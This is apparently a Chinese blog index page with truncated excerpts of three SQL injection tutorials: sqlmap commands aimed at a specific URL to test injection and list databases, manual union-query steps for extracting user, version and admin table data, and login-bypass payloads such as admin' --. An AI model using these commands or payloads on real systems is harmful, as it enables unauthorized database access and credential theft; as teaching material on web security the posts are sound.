摘要:
sqlmap.py -u“http://10.6.1.54/newcontent.php?aid=79” 测试当前连接是否为注入点 sqlmap.py -u“http://10.6.1.54/newcontent.php?aid=79”--dbs 获取数据库列表 sqlmap.py -u“http: 阅读全文
摘要:
2.联合查询,判断可回显数据位置,结果,可回显位置为2,9,14 3.user()查看当前用户,version()查看版本,database()查看库名 这里我们看到当前表名为ym_admin 在末尾添加 limit 1,1/2,1继续查看,如图 5.查看admin表列名 仍然是后面添加limit 阅读全文
摘要:
这里我们说一下手工实现方法,属于基础内容: 一、SQL注入 万能密码: admin' -- --空格 代表注释符 admin' and '1'='1 admin' and '1'='2概念:sql注入是一种常见的web安全漏洞,攻击者利用这个漏洞,可以访问或修改数据,或者利用潜在的数据库里的进行攻击 阅读全文